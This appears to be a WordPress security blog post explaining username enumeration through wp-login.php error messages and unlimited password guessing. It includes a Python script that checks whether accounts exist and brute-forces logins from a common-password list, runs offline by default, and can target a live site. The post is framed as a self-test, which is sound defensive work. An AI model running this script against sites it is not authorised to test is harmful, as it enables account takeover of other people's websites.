Is my site vulnerable?

There are many potential vulnerabilities but here we’ll just consider two.

  1. Administrator username of “admin”
  2. Easy to crack password

Administrator username of “admin”

With the current version of WordPress (3.5.1) it is very easy to determine whether a site has a user named “admin”: just attempt to log in with the user name you want to test for, e.g. admin, and compare the error message you get back.

If the user name is invalid you will get:

ERROR: Invalid username. Lost your password?

If the user name is valid you will either get:

ERROR: The password you entered for the username admin is incorrect. Lost your password?

OR you’ll be logged in 🙂

Note: This was raised as a bug a long time ago (#12129 – Generic login failure message), but it was closed as “wontfix”, so the messages still differ in 3.5.1.

Easy to crack password

Once you’ve determined that the user name is valid, you can then try different passwords. By default WordPress does not lock you out after a certain number of failed attempts, so an automated tool can try hundreds of the most common passwords and will keep going until it is logged in or has run out of candidates. Lists of the 600 most common passwords are easy to find; some plugins even ship with a file containing one.
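Both checks above can be scripted against your own site. The following is an added example written for this page, not code from the original post or from WordPress itself. It assumes the stock wp-login.php POST fields (`log`, `pwd`, `wp-submit`, `testcookie`), the 3.5.1-era error strings quoted above, and a constructed in-memory stand-in for the site so it runs offline; `http_sender` is the only part that talks to a real server, the test-cookie value it sends is an assumption (wp-login.php only checks that the cookie is non-empty), and the password list is a short stand-in for a real “600 most common” list. Only point it at sites you own or are authorised to test.

```python
"""Self-test for the two weaknesses discussed above: the username oracle in
wp-login.php error messages and unlimited password guessing.
Added example for this page, not code from the original post.
Assumptions: stock wp-login.php POST fields (log, pwd, wp-submit, testcookie)
and the WordPress 3.5.1-era error strings quoted in the post."""
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, Optional, Tuple

# A sender takes (username, password) and returns (http_status, body_text).
Sender = Callable[[str, str], Tuple[int, str]]

INVALID_USER = "invalid_username"   # "ERROR: Invalid username."
WRONG_PASSWORD = "valid_username"   # "The password you entered for the username ... is incorrect."
LOGGED_IN = "logged_in"             # redirect to wp-admin
UNKNOWN = "unknown"                 # anything else: lockout page, captcha, plugin message, outage


def classify(status: int, body: str) -> str:
    """Map a wp-login.php response to one of the outcomes listed in the post."""
    if status in (301, 302, 303):   # a successful login redirects to wp-admin
        return LOGGED_IN
    if "Invalid username" in body:
        return INVALID_USER
    if "The password you entered for the username" in body:
        return WRONG_PASSWORD
    return UNKNOWN


def login_form(username: str, password: str) -> bytes:
    """URL-encoded body using the stock login form's field names."""
    return urllib.parse.urlencode(
        {"log": username, "pwd": password, "wp-submit": "Log In", "testcookie": "1"}
    ).encode()


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface the 302 instead of following it, so a successful login is visible."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_sender(login_url: str) -> Sender:
    """Live sender: POSTs to wp-login.php (e.g. https://example.com/wp-login.php).
    The test cookie is sent because wp-login.php rejects a post carrying testcookie=1 without it."""
    opener = urllib.request.build_opener(_NoRedirect)

    def send(username: str, password: str) -> Tuple[int, str]:
        req = urllib.request.Request(
            login_url, data=login_form(username, password),
            headers={"Cookie": "wordpress_test_cookie=WP+Cookie+check"},  # assumed value; only presence is checked
        )
        try:
            with opener.open(req, timeout=10) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:   # 302 and 4xx/5xx land here because of _NoRedirect
            return err.code, err.read().decode("utf-8", "replace")
    return send


def fake_site(users: Dict[str, str], lockout_after: Optional[int] = None) -> Sender:
    """Constructed stand-in for wp-login.php so the example runs offline.
    lockout_after=None reproduces stock WordPress (no lockout at all); an integer
    simulates a lockout plugin that starts refusing after that many failures."""
    failures: Dict[str, int] = {}
    lost = '<a href="/wp-login.php?action=lostpassword">Lost your password?</a>'

    def send(username: str, password: str) -> Tuple[int, str]:
        if lockout_after is not None and failures.get(username, 0) >= lockout_after:
            return 403, "<p>Too many failed login attempts. Try again later.</p>"
        if username not in users:
            return 200, '<div id="login_error"><strong>ERROR</strong>: Invalid username. ' + lost + "</div>"
        if users[username] == password:
            return 302, ""   # Location: /wp-admin/
        failures[username] = failures.get(username, 0) + 1
        return 200, ('<div id="login_error"><strong>ERROR</strong>: The password you entered for the '
                     f'username <strong>{username}</strong> is incorrect. ' + lost + "</div>")
    return send


def probe_username(send: Sender, username: str) -> str:
    """Section 1: one attempt with a throwaway password tells you whether the account exists."""
    return classify(*send(username, "not-the-real-password"))


def username_exists(send: Sender, username: str) -> bool:
    return probe_username(send, username) in (WRONG_PASSWORD, LOGGED_IN)


def guess_password(send: Sender, username: str, wordlist: Iterable[str]) -> Tuple[Optional[str], int, str]:
    """Section 2: walk a wordlist; returns (password or None, attempts made, stop reason).
    Stops as soon as the site answers with anything other than the plain wrong-password
    message, which is what a lockout or rate-limiting plugin looks like from outside."""
    attempts = 0
    for candidate in wordlist:
        attempts += 1
        verdict = classify(*send(username, candidate))
        if verdict == LOGGED_IN:
            return candidate, attempts, "logged_in"
        if verdict != WRONG_PASSWORD:
            return None, attempts, "stopped:" + verdict
    return None, attempts, "exhausted"


# Short constructed stand-in for a "600 most common passwords" list.
COMMON_PASSWORDS = ["123456", "password", "12345678", "qwerty", "abc123", "letmein", "admin", "welcome"]

if __name__ == "__main__":
    site = fake_site({"admin": "letmein"})   # stock WordPress: no lockout
    print("admin exists:", username_exists(site, "admin"), "| nobody exists:", username_exists(site, "nobody"))
    print("no lockout:", guess_password(site, "admin", COMMON_PASSWORDS))
    print("lockout after 3:", guess_password(fake_site({"admin": "letmein"}, lockout_after=3), "admin", COMMON_PASSWORDS))
```

To run it against a real install, replace `fake_site(...)` with `http_sender("https://example.com/wp-login.php")`. A result of `unknown` from `probe_username` means the login page no longer returns either 3.5.1 message (a plugin or a newer version may have changed it), so the oracle test is inconclusive rather than negative; a `stopped:unknown` from `guess_password` after a handful of attempts is the sign that some form of lockout is in place.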

WordPress security – user names and passwords